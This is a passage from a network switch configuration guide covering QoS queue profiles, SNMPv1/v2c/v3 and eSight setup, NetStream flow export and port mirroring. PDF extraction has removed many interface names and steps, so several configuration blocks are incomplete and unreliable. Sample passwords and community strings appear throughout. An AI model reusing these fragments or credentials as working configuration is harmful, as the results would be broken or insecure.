2 | packets: pass:
0
| drop:
0
| bytes: pass:
0
| drop:
0
--------------------------------------------------------------------------------
information
--------------------------------------------------------------------------------
3 | packets: pass:
4,125
| drop:
10,440,178
| bytes: pass:
610,500
| drop:
1,545,146,344
--------------------------------------------------------------------------------
information
--------------------------------------------------------------------------------
4 | packets: pass:
4,125
| drop:
5,218,027
| bytes: pass:
610,500
| drop:
772,267,996
--------------------------------------------------------------------------------
information
--------------------------------------------------------------------------------
5 | packets: pass:
4,125
| drop:
5,218,027
| bytes: pass:
610,500
| drop:
772,267,996

--------------------------------------------------------------------------------
information
--------------------------------------------------------------------------------
6 | packets: pass:
0
| drop:
0
| bytes: pass:
0
| drop:
0
--------------------------------------------------------------------------------
information
--------------------------------------------------------------------------------
7 | packets: pass:
2,092,988
| drop:
3,129,165
| bytes: pass:
309,762,224
| drop:
463,116,420
--------------------------------------------------------------------------------
----End
Configuration Files
#
sysname SwitchA
#
vlan batch
10
#
interface
port link-type
access
port default vlan
10
#
interface
port link-type
access
port default vlan
10
#
interface
port link-type
trunk
10
#
return


#
sysname SwitchB
#
vlan batch
20
#
interface
port link-type
access
port default vlan
20
#
interface
port link-type
access
port default vlan
20
#
interface
port link-type
trunk
20
#
return

#
sysname SwitchC
#
vlan batch 10
20
#
interface
port link-type
trunk
20
#
interface
port link-type
trunk
20
#
return

#
sysname Switch
#
vlan batch 10 20
#
diffserv domain ds1


#
acl number 4001
rule 1 permit vlan-id 10
acl number 4002
rule 1 permit vlan-id 20
#
flow-wred-profile wred1
color green low-limit 80 high-limit 100 discard-percentage 10
color yellow low-limit 60 high-limit 80 discard-percentage 20
color red low-limit 40 high-limit 60 discard-percentage 40
#
flow-queue-profile flow1
qos queue 1 wfq weight 10 flow-wred-profile wred1
qos queue 3 wfq weight 20 flow-wred-profile wred1
qos queue 5 flow-wred-profile wred1
#
interface
port link-type
trunk
10
trust upstream
ds1
trust 8021p
inner
#
interface
port link-type
trunk
20
trust upstream
ds1
trust 8021p
inner
#
interface
port link-type
trunk
20
traffic-user-queue outbound acl 4001 pir 8000 flow-queue-profile flow1
traffic-user-queue outbound acl 4002 pir 5000 flow-queue-profile flow1
#
return

S12700 Series Agile Switches 18 Typical Network Management and Monitoring
Typical Configuration Examples Configuration
18 Typical Network Management and

Monitoring Configuration
About This Chapter
18.1 Typical SNMP Configuration

18.2 Typical NetStream Configuration
18.3 Typical Mirroring Configuration
18.4 Typical iPCA Configuration

18.1 Typical SNMP Configuration

18.1.1 Example for Configuring a Device to Communicate with
the NMS Using SNMPv1
SNMP Overview
The Simple Network Management Protocol (SNMP) is a standard network management
protocol widely used on TCP/IP networks. SNMP uses a central computer (a network
management station) that runs network management software to manage network elements.
SNMP has the following advantages:
l Automatic configuration management: A network administrator can use SNMP to
quickly query information, modify data, locate faults, and so forth on any SNMP agent.
SNMP greatly improves work efficiency of network administrators.
l Multi-vendor management: SNMP shields the physical differences between devices of
different vendors. SNMP provides only a basic function set, so the managed tasks are
separated from the managed physical features and lower-layer interconnection
technologies. Therefore, SNMP can uniformly manage devices of different vendors.
SNMP is available in three versions. SNMPv1 is the initial version of SNMP. It provides
authentication based on community names. SNMPv1 has a low security level, and can return
only a few error codes. SNMPv2c issued by IETF is the second release of SNMP. SNMPv2c
has enhancements to standard error codes, data types (Counter 64 and Counter 32), and
operations including GetBulk and Inform. SNMPv2c does not improve the security, so IETF
issued SNMPv3 that provides User Security Module (USM)-based authentication and
encryption and View-based Access Control Model (VACM)-based access control.
SNMPv1 is applicable to small networks with simple networking and low security
requirements or small networks with good security and stability, such as campus networks and
small enterprise networks.
Configuration Notes
As shown in Figure 18-1, the NMS server manages all devices on the network. The network
is small and not likely to be attacked, so SNMPv1 is configured on switches to communicate
with the NMS server. A new switch is added to the network. The network administrator wants
to utilize the existing network resources to manage the new switch and quickly locate as well
as rectify network faults.
Figure 18-1 Configuring a device to communicate with the NMS using SNMPv1
GE1/0/1
10.1.1.1/24 VLAN10
10.1.1.2/24
NMS Switch

switch.
Procedure
[Switch] snmp-agent sys-info version v1 //By default, SNMPv3 is supported.
[Switch] acl 2001
take effect.
securityname adminnms01 v1 //Configure a trap host. By default, traps are sent by
UDP port 162.

the SNMP version to SNMPv1, the read/write community name to adminnms01, and the
traps.

NOTE
manage the switch.
----End
Configuration Files
#
sysname Switch
#
acl number 2001
rule 10 deny
#
snmp-agent
snmp-agent sys-info version v1 v3
cipher %^%#uq/!YZfvW4*vf[~C|.:Cl}UqS(vXd#wwqR~5M(rU%%^%#
#
return

the NMS Using SNMPv2c
SNMP Overview
SNMPv2c is applicable to medium and large networks with low security requirements or with
good security (for example, VPNs) but on which services are so busy that traffic congestion
may occur.

Configuration Notes
is large and secure but the service traffic volume on the network is high. Therefore, devices on
the network use SNMPv2c to communicate with the NMS server. For capacity expansion, a
new switch is added to the network. The network administrator wants to utilize the existing
network resources to manage the new switch and quickly locate as well as rectify network
faults.
Figure 18-2 Configuring a device to communicate with the NMS using SNMPv2c
GE1/0/1
10.1.1.1/24 VLAN10
10.1.1.2/24
NMS Switch
1. Configure SNMPv2c on the switch so that the NMS running SNMPv2c can manage the
switch.
Procedure
Step 1 Configure SNMPv2c on the switch so that the NMS running SNMPv2c can manage the
switch.
[Switch] snmp-agent sys-info version v2c //By default, SNMPv3 is supported.
[Switch] acl 2001

take effect.
securityname adminnms01 v2c //Configure a trap host. By default, traps are sent
by UDP port 162.

the SNMP version to SNMPv2c, the read/write community name to adminnms01, and the
traps.
NOTE
manage the switch.
----End
Configuration Files
#
sysname Switch
#
acl number 2001
rule 10 deny
#
snmp-agent
snmp-agent sys-info version v2c v3
cipher %^%#uq/!YZfvW4*vf[~C|.:Cl}UqS(vXd#wwqR~5M(rU%%^%# v2c
#
return


the NMS Using SNMPv3
SNMP Overview

SNMPv3 is applicable to networks of various scales, especially networks that have strict
security requirements and can be managed only by authorized network administrators. For
example, SNMPv3 can be used if data between the NMS and managed device needs to be
transmitted over a public network.
Configuration Notes
is large and is likely to be attacked. Therefore, devices on the network use SNMPv3 to
communicate with the NMS server. A new switch is added to the network. The network
administrator wants to utilize the existing network resources to manage the new switch and
quickly locate as well as rectify network faults.
Figure 18-3 Configuring a device to communicate with the NMS using SNMPv3
GE1/0/1
10.1.1.1/24 VLAN10
IP 10.1.10.2/24
Network
NMS Switch

switch.
3. Configure a user group and user based on which the switch permits access of the NMS.
5. Add the switch to the NMS. The user group and user configured on the switch must be
the same as those used by the NMS; otherwise, the NMS cannot manage the switch.
Procedure
[Switch] snmp-agent sys-info version v3 //By default, SNMPv3 is supported. If
SNMPv3 is not disabled, skip this command.
[Switch] acl 2001
Step 3 Configure a user group and user based on which the switch permits access of the NMS.
# Configure the user group group001, set the security level to privacy, and configure access
control to restrict the access of NMS to the switch.
[Switch] snmp-agent group v3 group001 privacy write-view isoview acl 2001 //
Configure a user group and apply an ACL to make the access control function take
effect.
# Configure the user user001.

[Switch] snmp-agent usm-user v3 user001 group group001 //Configure a user name
and add the user name to the specified user group.
# Set the authentication password to Authe@1234.

[Switch] snmp-agent usm-user v3 user001 authentication-mode sha //Set an
authentication mode to improve security of the managed switch running SNMPv3.
Please configure the authentication password (8-64)
Enter Password: //Enter the authentication password. It is
Authe@1234 in this example.
Confirm Password: //Confirm the password. It is Authe@1234 in this
example.
# Set the encryption password to Priva@1234.

[Switch] snmp-agent usm-user v3 user001 privacy-mode aes256 //Set an encryption

mode to improve security of the managed switch running SNMPv3.
Please configure the privacy password (8-64)
Enter Password: //Enter the encryption password. It is
Priva@1234 in this example.
Confirm Password: //Confirm the password. It is Priva@1234 in this
example.
securityname user001 v3 privacy //Configure a trap host. By default, traps are
sent by UDP port 162. The security name must be the same as the user name;
otherwise, the NMS cannot manage the device.
the SNMP version to SNMPv3, configuring the user group group001 and user user001,
setting the authentication mode to SHA and authentication password to Authe@1234, setting
the encryption mode to AES256 and encryption password to Priva@1234, and setting the
SNMP connection port to port 161 (default port used by the switch). In addition, set the trap
receiving port to port 162 (default port used by the switch) so that the NMS can receive traps.
NOTE
manage the switch.
----End
Configuration Files
#
sysname Switch
#
acl number 2001
rule 10 deny
#
snmp-agent
snmp-agent sys-info version v3
snmp-agent group v3 group001 privacy write-view isoview acl 2001
user001 v3 privacy
snmp-agent usm-user v3 user001
snmp-agent usm-user v3 user001 group group001
snmp-agent usm-user v3 user001 authentication-mode sha cipher %^%#*2C
%=4LZn1L>ni9xaybHdbXFW&[c_Wv0m!0MpTj!%^%#
snmp-agent usm-user v3 user001 privacy-mode aes256 cipher %^%#i\Fv-cC(u)
+x26S2'rEX<.;V+e~nP)*.J$Ulr($/%^%#
#
return

18.1.4 Example for Configuring eSight and Switches to

Communicate Through SNMPv2c
Introduction to eSight
eSight is a new-generation comprehensive operation, maintenance, and management solution
developed by Huawei for network infrastructure management, unified communications,
telepresence conferencing, video surveillance, and data center in enterprises. eSight supports
unified monitoring and configuration management over devices of various types and from
various vendors, monitors and analyzes network and service quality, manages enterprise
resources, services, and users in a unified manner, and analyzes association between them. In
addition, eSight offers a flexible and open platform that enables enterprises to customize
software and build an intelligent management system tailored to their own needs. This
example describes how a network administrator uses the Simple Network Management
Protocol Version 2c (SNMPv2c) to automatically discover network devices on eSight.
Configuration Notes
This example uses eSight V200R005C00 and switch V200R003C00. The configurations may
vary with software versions. For details, see the product manual of the corresponding version.
An enterprise administrator wants to use eSight to manage devices of the enterprise.
l The enterprise replans the network recently, and the number of devices on the entire
network increases to about 1000. It is labor-consuming if the administrator logs in to
each device to configure and manage the devices. The administrator needs to use a
network management system (NMS) to uniformly manage all the devices on the
network.
l Devices on the enterprise network belong to the R&D Dept and finance Dept, and
devices in the R&D Dept are divided into two service groups. The R&D Dept has 800
devices and the finance Dept has 200 devices. The administrator wants to manage the
devices by group, view the device status in different departments, and batch configure
services for devices in the same service group during the maintenance process.

Figure 18-4 Networking of automatic device discovery
R&D Dept A
R&D Dept B
Finance Dept
Requirement Analysis
l Enabling automatic device discovery: A large number of security devices and network
devices need to be deployed on a network. The automatic device discovery function
provided by eSight can reduce the administrator's workload, improve the operation
efficiency, and lower misoperations.
l Selecting the SNMPv2c protocol: A majority of the security devices and network devices
use SNMPv2c. SNMPv2c has higher security than SNMPv1, and is simple and easy to
configure compared with SNMPv3.
l Enabling the subnet function in topology monitoring: The subnet function in topology
monitoring enables eSight to monitor devices by area according to the subnet on which
the devices are located. The administrator can divide the enterprise network into multiple
subnets by department to implement differentiated management.
l Enabling the grouping function: During routine maintenance, the administrator needs to
batch configure devices that provide similar services. The grouping function enables
eSight to automatically add devices to different groups after grouping rules are set. The
administrator can batch perform authentication and alarm filtering operations for devices
in the same group.

Data Plan
Item Value Description
SNMP parameters Template name: SNMP_v2c It is recommended that the

SNMP version: v2c read and write community
names have high
Read community: Public123 complexity and meet
Write community: Private123 complexity requirements
NE port: 161 on devices to ensure
security. The highest
Timeout interval(s): 3 complexity is
Resending times: 3 recommended because
there are different
complexity requirements
for devices. For example,
the combination of upper-
case letters, lower-case
letters, and digits.
IP address Different network segment IP IP addresses are allocated

addresses are allocated based on the based on the service group
service group. and department. Devices
l R&D Dept A in a service group can
only use IP addresses in a
– Service group 1: specified network
192.168.11.0-192.168.11.255 segment, so that subnets
– Service group 2: can be divided and
192.168.12.0-192.168.12.255 devices can be grouped
l R&D Dept B based on IP addresses.
– Service group 3:
192.168.31.0-192.168.31.255
– Service group 4:
192.168.32.0-192.168.32.255
l Finance Dept:
192.168.51.0-192.168.51.255
Subnet The network is divided into three One subnet on eSight can
subnets and assigned subnet IP contain up to 500 devices.
address ranges. It is recommended that the
l subnet_rda (R&D Dept A): R&D Dept with 800
192.168.11.0-192.168.12.255 devices be divided into
two subnets, and the
l subnet_rdb (R&D Dept B): finance Dept into one
192.168.31.0-192.168.32.255 subnet.
l subnet_finance (Finance Dept):
192.168.51.0-192.168.51.255

Item Value Description
Grouping rule Five groups are divided based on the The start and end IP
service type and department. addresses are specified in
l group_rda1 (R&D Dept A, grouping rules. After
service group 1): eSight discovers the
192.168.11.0-192.168.11.255 devices, they are
automatically added to
l group_rda2 (R&D Dept A, different groups.
service group 2):
192.168.12.0-192.168.12.255
l group_rdb3 (R&D Dept B,
service group 1):
192.168.31.0-192.168.31.255
l group_rdb4 (R&D Dept B,
service group 2):
192.168.32.0-192.168.32.255
l group_finance (Finance Dept):
192.168.51.0-192.168.51.255
1. Configure SNMP parameters on the devices.
2. Create subnets on eSight.
3. Set grouping rules on eSight.
4. Create an SNMP template on eSight.
5. Enable eSight to discover devices using SNMP.
Prerequisites
IP addresses have been configured for devices on the network according to Data Plan, and
the devices can successfully communicate with eSight.
Procedure
Step 1 Configure SNMP parameters on the devices.
[SwitchA] snmp-agent //Start the SNMP agent service.
[SwitchA] snmp-agent sys-info version v2c //Set the SNMP version to v2c.
[SwitchA] snmp-agent mib-view included View_ALL iso //Create a MIB view
View_ALL.
[SwitchA] snmp-agent community read cipher Public123 mib-view View_ALL //
Configure a read community name and set the rights of the MIB view.
[SwitchA] snmp-agent community write cipher Private123 mib-view View_ALL //
Configure a write community name and set the rights of the MIB view.
[SwitchA] snmp-agent trap source MEth0/0/1 //Specify the source interface for
sending traps. Here, a management interface is specified as the source interface.
[SwitchA] snmp-agent trap enable //Enable the trap function to report alarms.
[SwitchA] snmp-agent target-host trap address udp-domain 192.168.10.10 params
securityname Public123 v2c //Set the eSight IP address to 192.168.10.10,
securityname to Public123, and version to v2c.

Step 2 Create subnets.

1. Choose Resource > Resource Management > Equipment Resources from the main menu.
2. In the navigation tree, choose Logical Resources > Subnet.

3. On the Subnet page, click .
4. In the dialog box that is displayed, enter the subnet name and description, and click OK.
Repeat the steps to create the other two subnets.
Step 3 Set grouping rules.

1. Choose Resource > Resource Management > Group Management from the main menu.
2. In the navigation tree, choose Device Group and click next to User Defined
Groups.
3. In the Basic Information dialog box, set the group name and description.
4. Click under Dynamic Rules to set grouping rules.
a. Set the rule name to rule_01.
b. Select satisfy all conditions.
c. Set the dynamic rule to IP address startwith 192.168.11.0.

d. Click next to the dynamic rule. A line is displayed under the dynamic rule. Set
the other dynamic rule to IP address endwith 192.168.11.255.
5. Click Confirm. The first grouping rule is set. Repeat the steps to set other grouping rules
according to Data Plan.
Step 4 Create an SNMP template on eSight.
1. Choose Resource > Resource Management > Protocol Template from the main menu.
2. In the navigation tree, choose SNMP Template and click .

3. Set parameters in the SNMP template according to Data Plan and click OK.

Step 5 Use the automatic device discovery function to add devices to eSight.
1. Choose Resource > Add Device > Automatic from the main menu.
2. Set Select discovery protocol to SNMP and Select discovery mode to Immediate
discovery.
3. Specify start and end IP addresses of network segments and add them to subnets.
Click Add Another Network Segment, specify start and end IP addresses of the
network segment and add it to the corresponding subnet.
4. Select Select template and select the template SNMP_v2c created in the preceding step
from the template list.
5. Select Auto add to NMS and click Start Discovery.
6. After automatic device discovery is complete, check whether all the devices matching
parameters in the template are added to eSight. Click Complete.

Step 6 Adjust the topology layout.

1. Choose Monitor > Topology > Topology Management from the main menu.
2. On the Physical topology page, adjust the device locations.
3. Click to save the new locations of the devices in the topology.
----End
Verification
1. Check devices on subnets.
a. Choose Monitor > Topology > Topology Management from the main menu.
b. Double-click the icon of subnet_finance in the topology to display the subnet

topology. Check whether all the devices in the finance Dept are added to the subnet.
If so, the operations are correct. Perform similar steps to check the other two
subnets. If devices are not added to the corresponding subnet, check the IP address
segments of the subnets.
2. Check grouping of devices.
a. Choose Resource > Resource Management > Group Management from the main
menu.
b. Choose Device Group > User Defined Groups > group_rda1. Check whether all
the devices in the service group 1 of R&D Dept A are added to the group. If so, the
operations are correct. Perform similar steps to check the other four groups. If
devices are not added to the corresponding group, check whether the devices are
added to eSight and whether grouping rules are correctly set.
18.2 Typical NetStream Configuration

18.2.1 Example for Configuring Original Flow Statistics Exporting

NetStream Overview
NetStream is a technology that collects statistics on and analyzes service traffic on networks.
NetStream facilitates accounting and network monitoring.
It has the following advantages:
l NetStream collects statistics on multiple types of information in packets. It provides
powerful statistics collection function and detailed statistical results.
l NetStream can be deployed at a low cost. No dedicated device is required to collect
traffic information and no device interface is occupied.
Original flow statistics are exported when the flow aging time expires. Statistics on every
flow are exported to the NetStream server. The NetStream server obtains detailed statistics on
every flow.
Configuration Notes
NetStream is supported by E series (except ET1D2X48SEC0), and X1E cards.
NetStream conflicts with IP Source Trail on modular switches, so do not configure them
simultaneously.

S12704 V200R008C00, V200R009C00
S12708 and S12712 V200R005C00, V200R006C00, V200R007C00,

V200R007C20, V200R008C00, V200R009C00
As shown in Figure 18-5, Department 1 and Department 2 connect to the Internet through
SwitchA. Network administrators want to monitor communication between the two
departments and the Internet, and perform accounting for each department.

Figure 18-5 Networking diagram for configuring original flow statistics exporting
Internet
GE1/0/1 GE1/0/2
VLANIF100 VLANIF200 NetStream server
10.1.1.1/24 10.1.2.1/24 10.1.2.2/24
GE1/0/4
GE1/0/3
VLANIF400
SwitchA VLANIF300
10.1.4.1/24
10.1.3.1/24
Department 1 Department 2
You can configure IPv4 original flow statistics exporting on GE1/0/1 of SwitchA. Configure
SwitchA to collect statistics on incoming and outgoing traffic on the interface, and to send the
statistics to the NetStream server for further analysis. In this way, you can monitor
communication between the two departments and the Internet, and perform accounting for
each department.
1. Configure IP addresses for interfaces on SwitchA.
2. Configure NetStream sampling.
3. Configure NetStream flow aging.
4. Configure original flow statistics exporting.
5. Configure the version of exported packets.
6. Enable NetStream flow statistics collection on GE1/0/1.
Procedure
Step 1 Configure IP addresses for interfaces on SwitchA according to Figure 18-5.
# Configure IP addresses for interfaces on SwitchA.


Step 2 Configure NetStream sampling.
# Configure NetStream sampling on GE1/0/1, set the sampling ratio to 1200.

[SwitchA-GigabitEthernet1/0/1] ip netstream sampler fix-packets 1200 inbound
[SwitchA-GigabitEthernet1/0/1] ip netstream sampler fix-packets 1200 outbound
Step 3 Configure NetStream flow aging.
# Set the inactive aging time to 100 seconds and enable FIN- and RST-based aging.
[SwitchA] ip netstream timeout inactive 100
[SwitchA] ip netstream tcp-flag enable
Step 4 Configure NetStream original flow statistics exporting.
# Set the source IP address of the exported packets carrying original flow statistics to
10.1.2.1, destination IP address to 10.1.2.2, and destination port number to 6000.
[SwitchA] ip netstream export source 10.1.2.1
[SwitchA] ip netstream export host 10.1.2.2 6000
Step 5 Configure the version of exported packets.
# Set the version of exported packets to V9.

[SwitchA] ip netstream export version 9
Step 6 Enable NetStream flow statistics collection on GE1/0/1.
# Enable NetStream flow statistics collection on GE1/0/1.

[SwitchA-GigabitEthernet1/0/1] ip netstream inbound
[SwitchA-GigabitEthernet1/0/1] ip netstream outbound
[SwitchA] quit

# After the configuration is complete, the NetStream server can receive statistics packets from
SwitchA. Run the display ip netstream statistics command on SwitchA to view NetStream
flow statistics.
<SwitchA> display ip netstream statistics slot 1
===== Netstream statistics: =====
Origin/Flexible ingress entries : 35
Origin/Flexible ingress packets : 381920
Origin/Flexible ingress octets : 125269760
Origin/Flexible egress entries : 0
Origin/Flexible egress packets : 0
Origin/Flexible egress octets : 0
Origin/Flexible total entries : 35
Handle origin entries : 35
Handle As aggre entries : 0
Handle ProtPort aggre entries : 0
Handle SrcPrefix aggre entries : 0
Handle DstPrefix aggre entries : 0
Handle Prefix aggre entries : 0
Handle AsTos aggre entries : 0
Handle ProtPortTos aggre entries : 0
Handle SrcPreTos aggre entries : 0
Handle DstPreTos aggre entries : 0
Handle PreTos aggre entries : 0
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100 200 300 400
#
ip netstream timeout inactive 100
ip netstream export version 9
ip netstream export source 10.1.2.1
ip netstream export host 10.1.2.2 6000
#
ip netstream tcp-flag enable
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif200
ip address 10.1.2.1 255.255.255.0
#
interface Vlanif300
ip address 10.1.3.1 255.255.255.0
#
interface Vlanif400
ip address 10.1.4.1 255.255.255.0
#
ip netstream inbound
ip netstream outbound
ip netstream sampler fix-packets 1200 inbound
ip netstream sampler fix-packets 1200 outbound
#

#
#
#
return
18.2.2 Example for Configuring Aggregation Flow Statistics

Exporting
NetStream Overview

In aggregation flow statistics exporting, the device summarizes the flows with the same
aggregation keywords, and obtains statistics on the aggregation flow. The aggregation flow
statistics obviously reduce bandwidth occupation.
Configuration Notes
simultaneously.

S12704 V200R008C00, V200R009C00
S12708 and S12712 V200R005C00, V200R006C00, V200R007C00,

V200R007C20, V200R008C00, V200R009C00
departments and the Internet.

Figure 18-6 Networking diagram for configuring aggregation flow statistics exporting
Internet
GE1/0/1 GE1/0/2
10.1.1.1/24 10.1.2.1/24 10.1.2.2/24
GE1/0/4
GE1/0/3
VLANIF400
SwitchA VLANIF300
10.1.4.1/24
10.1.3.1/24
You can configure IPv4 aggregation flow statistics exporting on GE1/0/1 of SwitchA.
Configure SwitchA to collect statistics on incoming and outgoing traffic on the interface, and
to send the statistics to the NetStream server for further analysis. In this way, you can monitor
communication between the two departments and the Internet.
2. Configure NetStream aggregation flow statistics exporting.
3. Configure the version of exported packets.
4. Enable NetStream flow statistics collection on GE1/0/1.
Procedure


Step 2 Configure NetStream aggregation flow statistics exporting.

# Configure the aggregation keyword protocol-port, and set the source IP address of the
exported packets to 10.1.2.1, destination IP address to 10.1.2.2, and destination port number
to 6000.
[SwitchA] ip netstream aggregation protocol-port
[SwitchA-aggregation-protport] ip netstream export source 10.1.2.1
[SwitchA-aggregation-protport] ip netstream export host 10.1.2.2 6000
[SwitchA-aggregation-protport] enable
Step 3 Configure the version of exported packets.

# Set the version of the exported packets carrying aggregation flow statistics to V9.
[SwitchA-aggregation-protport] export version 9
[SwitchA-aggregation-protport] quit
Step 4 Enable NetStream flow statistics collection on GE1/0/1.

# Enable NetStream flow statistics collection on GE1/0/1.
[SwitchA] quit

flow statistics.


----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100 200 300 400
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif200
ip address 10.1.2.1 255.255.255.0
#
interface Vlanif300
ip address 10.1.3.1 255.255.255.0
#
interface Vlanif400
ip address 10.1.4.1 255.255.255.0
#
#
#
#
#
ip netstream aggregation protocol-port
enable
export version 9
#
return
18.2.3 Example for Configuring Flexible Flow Statistics Exporting

NetStream Overview
In flexible flow statistics exporting, flows are set based on customized rules. You can
customize flows based on the protocol type, DSCP priority, source IP address, destination IP
address, source port number, destination port number, or flow label as required. Flexible flow
statistics are sent to the NetStream server. Compared with original flow statistics collection,
flexible flow statistics collection occupies less traffic and is more flexible.
Configuration Notes
simultaneously.

S12704 V200R008C00, V200R009C00
S12708 and S12712 V200R005C00, V200R006C00, V200R007C00,

V200R007C20, V200R008C00, V200R009C00
departments and the Internet.

Figure 18-7 Networking diagram for configuring flexible flow statistics exporting
Internet
GE1/0/1 GE1/0/2
10.1.1.1/24 10.1.2.1/24 10.1.2.2/24
GE1/0/4
GE1/0/3
VLANIF400
SwitchA VLANIF300
10.1.4.1/24
10.1.3.1/24
You can configure IPv4 flexible flow statistics exporting on GE1/0/1 of SwitchA. Configure
SwitchA to collect statistics on incoming and outgoing traffic on the interface, and to send the
statistics to the NetStream server for further analysis. In this way, you can monitor
communication between the two departments and the Internet.
2. Configure a flexible flow statistics template.
3. Configure NetStream flexible flow statistics exporting.
4. Enable flexible flow statistics collection on GE1/0/1.
Procedure


Step 2 Configure a flexible flow statistics template.

# Create a flexible flow statistics template test to aggregate flows based on the destination IP
address and destination port number, and configure the exported packets to contain the
number of bytes and packets and the indexes of the inbound and outbound interfaces.
[SwitchA] ip netstream record test
[SwitchA-record-test] match ip destination-address
[SwitchA-record-test] match ip destination-port
[SwitchA-record-test] collect interface input
[SwitchA-record-test] collect interface output
[SwitchA-record-test] collect counter bytes
[SwitchA-record-test] collect counter packets
[SwitchA-record-test] quit
Step 3 Configure NetStream flexible flow statistics exporting.

# Set the source IP address of the exported packets carrying flexible flow statistics to 10.1.2.1,
destination IP address to 10.1.2.2, and destination port number to 6000.
[SwitchA] ip netstream export source 10.1.2.1
[SwitchA] ip netstream export host 10.1.2.2 6000
Step 4 Enable flexible flow statistics collection on GE1/0/1.

# Enable flexible flow statistics collection on GE1/0/1, and apply the flexible flow statistics
template test to GE1/0/1.
[SwitchA-GigabitEthernet1/0/1] port ip netstream record test
[SwitchA] quit

flow statistics.


Record test handle entries : 10
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100 200 300 400
#
#
ip netstream record test
match ip destination-address
match ip destination-port
collect counter packets
collect counter bytes
collect interface input
collect interface output
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif200
ip address 10.1.2.1 255.255.255.0
#
interface Vlanif300
ip address 10.1.3.1 255.255.255.0
#
interface Vlanif400
ip address 10.1.4.1 255.255.255.0
#
port ip netstream record test
#
#
#


#
return
18.3 Typical Mirroring Configuration
18.3.1 Example for Configuring Local Port Mirroring (1:1

Mirroring)
Local Port Mirroring Overview

In local port mirroring, an observing port is directly connected to a monitoring device and
directly forwards the packets copied from a mirrored port to the monitoring device for fault
location and service monitoring.
Configuration Notes
l An observing port is dedicated to forwarding mirrored traffic. Do not configure other
services on an observing port; otherwise, mirrored traffic and other service traffic
interfere with each other.
l If the mirroring function is deployed on many ports of a device, a great deal of internal
forwarding bandwidth will be occupied, which may affect the forwarding of other
services. Additionally, if the mirrored port and observing port provide different
bandwidth, for example, 1000 Mbit/s on the mirrored port and 100 Mbit/s on the
observing port, the observing port may fail to forward all mirrored packets in a timely
manner because of insufficient bandwidth, leading to packet loss.
l On all Huawei S series modular switch models, Eth-Trunks can be configured as
observing ports.
l Both Ethernet ports and Eth-Trunks can be configured as mirrored ports. If an Eth-Trunk
is configured as a mirrored port, its member ports cannot be configured as observing
ports.
l This example applies to all models.
As shown in Figure 18-8, the administrative department of a company accesses the Internet
through the Switch, and the monitoring device Server is directly connected to the Switch.
Internet access traffic of the administrative department needs to be monitored through the
Server.

Figure 18-8 Networking of local port mirroring
Internet
Switch Server
GE1/0/2
GE1/0/1
Administrative
department
HostA HostB HostC
Mirrored port
Local observing port
Original packets
Mirrored packets
1. Configure GE1/0/2 of the Switch as a local observing port to forward mirrored packets to
the Server.
2. Configure GE1/0/1 of the Switch as a mirrored port to copy Internet access traffic of the
administrative department to the local observing port.
Procedure
Step 1 Configure an observing port.
# Configure GE1/0/2 of the Switch as a local observing port.

[Switch] observe-port 1 interface gigabitethernet 1/0/2 //Configure GE1/0/2
as a local observing port 1.
Step 2 Configure a mirrored port.
# Configure GE1/0/1 of the Switch as a mirrored port to copy the packets received by the
mirrored port to the local observing port.


[Switch-GigabitEthernet1/0/1] port-mirroring to observe-port 1 inbound //
Mirror incoming packets on GE1/0/1 to observing port 1.
# Check the observing port configuration.

<Switch> display observe-port
----------------------------------------------------------------------
Index : 1
Untag-packet : No
----------------------------------------------------------------------
# Check the mirrored port configuration.

<Switch> display port-mirroring
----------------------------------------------------------------------
Observe-port 1 : GigabitEthernet1/0/2
----------------------------------------------------------------------
Port-mirror:
----------------------------------------------------------------------
Mirror-port Direction Observe-port
----------------------------------------------------------------------
1 GigabitEthernet1/0/1 Inbound Observe-port 1
----------------------------------------------------------------------
----End
Configuration Files
#
sysname Switch
#
observe-port 1 interface GigabitEthernet1/0/2
#
port-mirroring to observe-port 1 inbound
#
return
Related Content
Support Community
Mirroring – an Effective Network Monitoring Tool (Working Mechanism and

Configuration)
Mirroring – an Effective Network Monitoring Tool (Specifications)
Videos
How to Configure Port Mirroring
18.3.2 Example for Configuring Local Port Mirroring (1:N

Mirroring in Which Observing Ports Are Configured One by
One)

1:N Mirroring Overview

In 1:N mirroring, packets on one mirrored port are copied to N observing ports so that the
packets can be copied to different monitoring devices for analysis and processing.
In 1:N mirroring, multiple observing ports need to be configured and connected to different
monitoring devices. Observing ports can be configured one by one or in a batch. The single
and batch configuration modes can be used simultaneously. Observing ports configured in a
batch can be bound to the same mirrored port to simplify the configuration of 1:N mirroring.
Therefore, batch configuration is recommended in 1:N mirroring.
Configuration Notes
observing ports.
ports.
l The following table lists the applicable products and versions of this configuration
example.
S12704 V200R008C00, and V200R009C00

X1E series cards do not support 1:N mirroring in which
observing ports are configured one by one, and other cards
support 1:N mirroring in the inbound and outbound
directions.
S12708 and S12712 V200R005C00, V200R006C00, V200R007C00,

V200R007C20, V200R008C00, and V200R009C00
X1E series cards do not support 1:N mirroring in which
observing ports are configured one by one, and other cards
support 1:N mirroring in the inbound and outbound
directions.
NOTE

As shown in Figure 18-9, the R&D department of a company accesses the Internet through
the Switch, and monitoring devices Server1, Server2, and Server3 are directly connected to
the Switch.
Internet access traffic of the R&D department needs to be mirrored to different servers for
different monitoring and analysis purposes.
Figure 18-9 Local port mirroring networking
In te rn e t
S e rve r1
/4
1 /0
GE S e rve r2
S w itch
G E 1 /0 /3
G E 1 /0 /1 GE
1 /0
/2 S e rve r3
R&D
d e p a rtm e n t
H o stA H o stB H o stC
M irro re d p o rt
L o ca l o b se rvin g p o rt
O rig in a l p a cke ts
M irro re d p a cke ts
1. Configure GE1/0/2 through GE1/0/4 of the Switch as local observing ports to forward
mirrored packets to different servers.
2. Configure GE1/0/1 of the Switch as a mirrored port to copy the traffic passing through it
to different local observing ports.
Procedure
Step 1 Configure observing ports.
# Configure GE1/0/2 through GE1/0/4 of the Switch as local observing ports one by one.
as a local observing port with the index 1.
as a local observing port with the index 2.


mirrored port to local observing ports.
Mirror incoming traffic on GE1/0/1 to observing port 1.
[Switch-GigabitEthernet1/0/1] port-mirroring to observe-port 3 inbound
[Switch-GigabitEthernet1/0/1] return //Mirror incoming traffic on GE1/0/1 to
observing port 3.

----------------------------------------------------------------------
Index : 1
Untag-packet : No
----------------------------------------------------------------------
Index : 2
Untag-packet : No
